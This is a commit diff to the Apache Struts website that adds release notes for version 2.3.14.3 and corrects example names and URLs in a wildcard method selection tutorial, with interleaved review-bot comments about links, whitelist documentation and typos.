+      </DIV>
+
+      <DIV class="pagecontent">
+        <DIV class="wiki-content">
+          <P><IMG class="emoticon" 
src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif"; 
height="16" width="16" align="absmiddle" alt="" border="0"> These are the notes 
for the Struts 2.3.14.3 distribution.</P>
+
+<P><IMG class="emoticon" 
src="https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif"; 
height="16" width="16" align="absmiddle" alt="" border="0"> For prior notes in 
this release series, see <A href="" title="Version Notes 2.3.14.3">Version 
Notes 2.3.14.3</A></P>
+
+<UL>
+       <LI>If you are a Maven user, you might want to get started using the <A 
href="struts-2-maven-archetypes.html" title="Struts 2 Maven Archetypes">Maven 
Archetype</A>.</LI>
+       <LI>Another quick-start entry point is the <B>blank</B> application. 
Rename and deploy the WAR as a starting point for your own development.</LI>
+</UL>
+
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeHeader 
panelHeader" style="border-bottom-width: 1px;"><B>Maven 
Dependency</B></DIV><DIV class="codeContent panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag">&lt;dependency&gt;</SPAN>
+  <SPAN class="code-tag">&lt;groupId&gt;</SPAN>org.apache.struts<SPAN 
class="code-tag">&lt;/groupId&gt;</SPAN>
+  <SPAN class="code-tag">&lt;artifactId&gt;</SPAN>struts2-core<SPAN 
class="code-tag">&lt;/artifactId&gt;</SPAN>
+  <SPAN class="code-tag">&lt;version&gt;</SPAN>2.3.14.3<SPAN 
class="code-tag">&lt;/version&gt;</SPAN>
+<SPAN class="code-tag">&lt;/dependency&gt;</SPAN>
+</PRE>
+</DIV></DIV>
+
+<P>You can also use Struts Archetype Catalog like below</P>
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeHeader 
panelHeader" style="border-bottom-width: 1px;"><B>Struts Archetype 
Catalog</B></DIV><DIV class="codeContent panelContent">
+<PRE class="code-none">
+mvn archetype:generate -DarchetypeCatalog=http://struts.apache.org/
+</PRE>
+</DIV></DIV>
+
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeHeader 
panelHeader" style="border-bottom-width: 1px;"><B>Staging 
Repository</B></DIV><DIV class="codeContent panelContent">
+<PRE class="code-xml"><SPAN class="code-tag">&lt;repositories&gt;</SPAN>
+  <SPAN class="code-tag">&lt;repository&gt;</SPAN>
+    <SPAN class="code-tag">&lt;id&gt;</SPAN>apache.nexus<SPAN 
class="code-tag">&lt;/id&gt;</SPAN>
+    <SPAN class="code-tag">&lt;name&gt;</SPAN>ASF Nexus Staging<SPAN 
class="code-tag">&lt;/name&gt;</SPAN>
+    <SPAN 
class="code-tag">&lt;url&gt;</SPAN>https://repository.apache.org/content/groups/staging/<SPAN
 class="code-tag">&lt;/url&gt;</SPAN>
+  <SPAN class="code-tag">&lt;/repository&gt;</SPAN>
+<SPAN class="code-tag">&lt;/repositories&gt;</SPAN></PRE>
+</DIV></DIV>
+
+<H2><A name="VersionNotes2.3.14.3-InternalChanges"></A>Internal Changes</H2>
+
+<UL>
+       <LI>Whitelisting of actions' names was introduced and double evaluation 
of OGNL expression was removed.</LI>
+</UL>
+
+
+<H3><A name="VersionNotes2.3.14.3-IssueDetail"></A>Issue Detail</H3>
+
+<UL>
+       <LI><A 
href="https://issues.apache.org/jira/secure/ReleaseNote.jspa?version=12324579&projectId=12311041";
 class="external-link" rel="nofollow">JIRA Release Notes 2.3.14.3</A></LI>
+       <LI><A href="s2-015.html" title="S2-015">Security Bulletin 
S2-015</A></LI>
+</UL>
+
+
+<H3><A name="VersionNotes2.3.14.3-IssueList"></A>Issue List</H3>
+
+<UL>
+       <LI><A href="https://issues.apache.org/jira/issues/?filter=12324236"; 
class="external-link" rel="nofollow">Struts 2.3.14.3 DONE</A></LI>
+       <LI><A href="https://issues.apache.org/jira/issues/?filter=12323783"; 
class="external-link" rel="nofollow">Struts 2.3.15 TODO</A></LI>
+       <LI><A href="https://issues.apache.org/jira/issues/?filter=12318399"; 
class="external-link" rel="nofollow">Struts 2.3.x TODO</A></LI>
+</UL>
+
+
+<H3><A name="VersionNotes2.3.14.3-Otherresources"></A>Other resources</H3>
+
+<UL>
+       <LI><A href="http://www.mail-archive.com/commits@struts.apache.org/"; 
class="external-link" rel="nofollow">Commit Logs (Struts 1 and Struts 
2)</A></LI>
+       <LI><A href="http://svn.apache.org/viewvc/struts/struts2/trunk/"; 
class="external-link" rel="nofollow">Source Code Repository (includes change 
browsing)</A></LI>
+</UL>
+
+        </DIV>
+
+        
+      </DIV>
+    </DIV>
+    <DIV class="footer">
+      Generated by
+      <A href="http://www.atlassian.com/confluence/";>Atlassian Confluence</A> 
(Version: 3.4.9 Build: 2042 Feb 14, 2011)
+      <A href="http://could.it/autoexport/";>Auto Export Plugin</A> (Version: 
1.0.0-dkulp)
+    </DIV>
+  </BODY>
+</HTML>
\ No newline at end of file
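Review bot: the "For prior notes in this release series" link in the added page has an empty href and names the release itself (<A href="" title="Version Notes 2.3.14.3">Version Notes 2.3.14.3</A>); it should carry a real href and point at the preceding release's notes rather than at 2.3.14.3. The Internal Changes bullet ("Whitelisting of actions' names was introduced and double evaluation of OGNL expression was removed") is the only description of a security-relevant behaviour change in these notes; it should state what the whitelist accepts (which characters or pattern an action name may contain) so that users upgrading can tell whether their existing action names and wildcard mappings still resolve, and it should reference the S2-015 bulletin that is already listed under Issue Detail. Minor: the file is committed without a trailing newline ("\ No newline at end of file").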

Modified: 
websites/production/struts/content/development/2.x/docs/wildcard-method-selection.html
==============================================================================
--- 
websites/production/struts/content/development/2.x/docs/wildcard-method-selection.html
 (original)
+++ 
websites/production/struts/content/development/2.x/docs/wildcard-method-selection.html
 Wed Jun  5 05:14:58 2013
@@ -123,7 +123,7 @@ under the License. 
 
       <DIV class="pagecontent">
         <DIV class="wiki-content">
-          <DIV class="panelMacro"><TABLE class="infoMacro"><COLGROUP><COL 
width="24"><COL></COLGROUP><TR><TD valign="top"><IMG 
src="https://cwiki.apache.org/confluence/images/icons/emoticons/information.gif";
 width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>The 
example code for this tutorial, Wildcard_Method_Struts2_Ant or 
Wildcard_Method_Struts2_Mvn, is available on Google Code - <A 
href="http://code.google.com/p/struts2-examples/downloads/list"; 
class="external-link" 
rel="nofollow">http://code.google.com/p/struts2-examples/downloads/list</A>. 
After downloading and unzipping the file, you'll have a folder named 
Wildcard_Method_Struts2_Ant (or Wildcard_Method_Struts2_Mvn). In that folder 
will be a README.txt file with instructions on now to build and run the example 
application.</TD></TR></TABLE></DIV>
+          <DIV class="panelMacro"><TABLE class="infoMacro"><COLGROUP><COL 
width="24"><COL></COLGROUP><TR><TD valign="top"><IMG 
src="https://cwiki.apache.org/confluence/images/icons/emoticons/information.gif";
 width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>The 
example code for this tutorial, Wildcard_Method_Struts2_Mvn, is available on 
Google Code - <A 
href="http://code.google.com/p/struts2-examples/downloads/list"; 
class="external-link" 
rel="nofollow">http://code.google.com/p/struts2-examples/downloads/list</A>. 
After downloading and unzipping the file, you'll have a folder named 
Wildcard_Method_Struts2_Mvn. In that folder will be a README.txt file with 
instructions on now to build and run the example 
application.</TD></TR></TABLE></DIV>
 
 <H3><A name="WildcardMethodSelection-Introduction"></A>Introduction</H3>
 <P>In this tutorial we'll cover how to configure an action node in the 
struts.xml configuration file so that one action node can be used to<BR>
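Review bot: the rewritten info panel keeps the typo "instructions on now to build and run the example application" from the original text; since this line is being rewritten anyway, change "now" to "how". Dropping Wildcard_Method_Struts2_Ant is consistent with the URL fixes later in this file, which use only Wildcard_Method_Struts2_Mvn.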
@@ -175,17 +175,17 @@ relate several different Action URLs to 
 
 <P>The * is the wildcard character. Any action name values that end in 
&quot;Person&quot; will be handled by this action mapping. Whatever value is 
before &quot;Person&quot; will be the value used for the method attribute (the 
{1} place holder will be replaced with that value). For example this URL:</P>
 
-<P>    <A 
href="http://localhost:8080/Wildcard_Method_Struts_2_Mvn/createPerson.action"; 
class="external-link" 
rel="nofollow">http://localhost:8080/Wildcard_Method_Struts_2_Mvn/createPerson.action</A></P>
+<P>    <A 
href="http://localhost:8080/Wildcard_Method_Struts2_Mvn/createPerson.action"; 
class="external-link" 
rel="nofollow">http://localhost:8080/Wildcard_Method_Struts2_Mvn/createPerson.action</A></P>
 
 <P>will be be processed by the the above action mapping and method create of 
class PersonAction will be called. While this URL</P>
 
-<P>    <A 
href="http://localhost:8080/Wildcard_Method_Struts_2_Mvn/deletePerson.action"; 
class="external-link" 
rel="nofollow">http://localhost:8080/Wildcard_Method_Struts_2_Mvn/deletePerson.action</A></P>
+<P>    <A 
href="http://localhost:8080/Wildcard_Method_Struts2_Mvn/deletePerson.action"; 
class="external-link" 
rel="nofollow">http://localhost:8080/Wildcard_Method_Struts2_Mvn/deletePerson.action</A></P>
 
 <P>will cause the delete method of class PersonAction to be called.</P>
 
 <P>What happens if we have a URL with nothing in front of Person? For 
example:</P>
 
-<P>    <A 
href="http://localhost:8080/Wildcard_Method_Struts_2_Mvn/Person.action"; 
class="external-link" 
rel="nofollow">http://localhost:8080/Wildcard_Method_Struts_2_Mvn/Person.action</A></P>
+<P>    <A 
href="http://localhost:8080/Wildcard_Method_Struts2_Mvn/Person.action"; 
class="external-link" 
rel="nofollow">http://localhost:8080/Wildcard_Method_Struts2_Mvn/Person.action</A></P>
 
 <P>If there is no value in front of Person, then the Struts 2 framework will 
call the execute method of the class PersonAction.</P>
 
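Review bot: the URL corrections (Wildcard_Method_Struts_2_Mvn to Wildcard_Method_Struts2_Mvn) now match the folder name given in the info panel, but the unchanged context line "will be be processed by the the above action mapping" carries two doubled words that should be fixed in the same pass, and "{1} place holder" should read "{1} placeholder".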

